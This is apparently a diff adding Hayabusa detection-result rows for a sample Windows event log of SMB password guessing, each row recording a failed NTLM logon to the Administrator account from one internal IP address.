+2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AQUb6CnMUtyrMNhF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP5OxHPsbLHnIUBE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ysg903vYFhQHYvFJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IySarHtsTvwSP56H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GnUy8tbCIAVnmhDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bfBtc4MnMtPG6MpC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37b8MGIHY8QwXf9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDuaWikplDmJNmIE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0kSSoAYJILHCPI7K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9ikrtTGcZYU1556  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ypyd6SagvUXQHhtZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWS37lIJ3Q6ghgMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H211KmFImpBRwTGW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64tO5iBehXQcNc49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xvxDngRj3j5TAwST  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O8VYRjMnxDgUTWYf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhWphTesbUf0hwi1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MO8VRRVANxIkDzEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ziSXANiDAf7LRFz5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g0CvYYtyEcU2riBX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPg2LKgWMeM0Oqo0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbzL9T2d4RdeCz4q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PeEfbWpoipfYtOKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RKJW1vSrIAbRTzyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aU4G8NBru22Vc4Cl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sacBcqxV97FUihrd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 41Ms0lEMeT0jYxYj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkQWVEHGM1NxowR0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4qKqRY7L2IQRoU57  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMIkvwbvqc9V6CFs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PehzjCnK42ZPUE7e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fqw2GWiYfO0kU83  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFPJJNCFdPJl4igl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zc6CrAr7YoozKB6r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHXminAIeV4ZJIK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06YmUCHNZqbaZMdZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fYoENCtP2uPy9xNh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TRJRuXJTTH1afAfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpnkzTlc3Uvj3hpY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIuD8haFzR8P87rL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XL1IreMAiE564NXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMUiCaMGBC46MnPJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MOSWbwooyb60LExG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oSDNF7s3vbtkZIOz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JBMk0qOV6237XtK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j41R1U1tYPvApCkZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OcPkVZSeg5VwChW8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDLxt5gaFDTKsiVl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 94JvBKdxJkawQQMT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KgBMk00K3iC1GQem  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XdGOj9Ybm6bcCo3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: by6F4YKorxhp5ahn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1G6ZOgOaV6luDQN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qqSwNfvpPLQd6ZH1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mxtJJj54xSzHibHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Y3yznfdaZ7dtwDO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esllFn4asbLxwkBu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Pr0cgd6cF5ukhZ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pS2fabTrbl6rZ1NB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkylDDmUyuT57HdH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Aqs8rSvuLAQuhfDp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KI07KTgBJc4kBSKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Re3n3nJ8EEhRRT3G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BzspAC3z1csEn0Ve  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tpkb6bf42SLUst3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1F5d2wn60OgAExW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bhPNRHWhTyonDPuA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zEsnyWpUuHVBo6et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I2FwaWy9TALkk9eU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fuikeQsxlOUVifVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZWdsRJp9fHypPI1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B0j0IBX2eZnx99n9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
